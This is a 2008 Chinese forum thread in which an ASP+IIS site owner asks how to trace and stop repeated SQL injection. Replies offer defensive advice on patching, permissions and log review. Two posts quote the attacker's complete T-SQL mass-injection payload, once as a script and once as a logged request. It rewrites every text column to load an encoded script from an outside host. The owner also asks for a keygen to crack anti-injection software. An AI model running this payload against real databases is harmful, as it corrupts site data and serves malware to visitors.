asp+iis的网站这几天经常被注入

luckufo 2008-05-07 10:45:47
公司的网站这几天频繁受到攻击,数据库一些表被修改???
有什么好点的办法查看到谁在进行注入???
下了一个 "ASPISAPI通用防注入" 谁有注册机???
...全文
191 13 打赏 收藏 转发到动态 举报
写回复
用AI写文章
13 条回复
切换为时间正序
请发表友善的回复…
发表回复
jhwcd 2008-05-09
  • 打赏
  • 举报
回复
把涉及程序带参数的都加上SQL 注入补丁,文件夹的权限不要给太大,另外数据库链接用户的尽量不要用SA,数据库用户的权限也不要给太大。
yifanwu 2008-05-09
  • 打赏
  • 举报
回复
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+cast(0x3c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312533312533382533382532452537372537332f312e6a733e3c2f7363726970743e3c212d2d as varchar(67))') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;
luckufo 2008-05-09
  • 打赏
  • 举报
回复
farswear 2008-05-09
  • 打赏
  • 举报
回复
郁闷,查看日志就行了,肯定有痕迹的
luckufo 2008-05-09
  • 打赏
  • 举报
回复
id=280409&zt=zx;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;--


大家帮忙分析下?
做过防SQL注入脚本
lymyx 2008-05-09
  • 打赏
  • 举报
回复
上传漏洞,数据库表建设的太简单都是有可能的.
luckufo 2008-05-09
  • 打赏
  • 举报
回复
是查看IIS的日志还是服务器安全日志?
jykgps 2008-05-07
  • 打赏
  • 举报
回复
情况多了,看看是注入漏洞还是上传漏洞,还是主机不安全,是给别人旁注的.
注入的话,去网上找个通用防注入的代码,自己会写的话,自己写,
上传漏洞的话,把上传文件的asp程序删掉,
要是给别人旁注,那就得联系主机提供商.这个你也没办法.要么换主机.
  • 打赏
  • 举报
回复
通用得防注入都可以饶过去得,没有什么用!
一般传木马得这种,又修改了你的数据,你无从查起是谁弄的


最好的办法是对自己的网站重新做安全

当然也只能是对本站得安全最好,如果服务器是你的,你还可以做好服务起安全
不过,别人还想入侵你的话,你服务器作好了安全他还可以跨服务器
所以,安全只能是相对的
senvenliu 2008-05-07
  • 打赏
  • 举报
回复
服务器不是有日志吗?
yifanwu 2008-05-07
  • 打赏
  • 举报
回复
谁黑你不是一目了然的记录在你的服务器上么?一查就知道他是怎么样进来的了
Edwingu 2008-05-07
  • 打赏
  • 举报
回复
对,要知道是注入攻击,还是上传攻击,注入的话,一般的防注入代码都可以解决大部分问题.
上传的话,文件会有被修改的痕迹,修改时间等..应该能看出.
luckufo 2008-05-07
  • 打赏
  • 举报
回复
通用防注入的代码 一使用就100%

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧